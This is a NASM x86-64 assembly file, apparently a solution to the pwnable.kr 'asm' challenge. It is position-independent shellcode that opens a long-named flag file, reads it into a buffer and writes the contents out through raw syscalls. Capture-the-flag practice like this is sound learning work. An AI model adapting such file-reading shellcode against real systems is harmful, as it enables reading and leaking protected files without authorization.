BITS 64

global _start
section .data

message:
        db "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong",0
        ;db "flag",0
buffer:
        times 0x100 db 0

%macro pic 0
    call ni
    ni: pop rbp
%endmacro
%define pos(adr) rbp +adr - ni



section .text

_start:
        pic
        ;open----------------
        lea rdi,[pos(message)]
        xor rsi,rsi ; rsi = O_RDONLY - not
        xor rdx,rdx
        mov rax,0x2
        syscall
        
        ;read----------------
        
        mov rdi,rax
        lea rsi,[pos(buffer)]
        mov rdx,0x100
        xor rax,rax
        syscall
        
        
        ;write--------------
        push rdi
        xor rdi,rdi
        mov rax,0x1
        syscall
        
        
        ;close fd--------------
        pop rdi
        mov rax,3
        syscall
        
        
        
        
        ;exit---------------
        mov rax,60
        xor rdi,rdi
        syscall
        
   
        
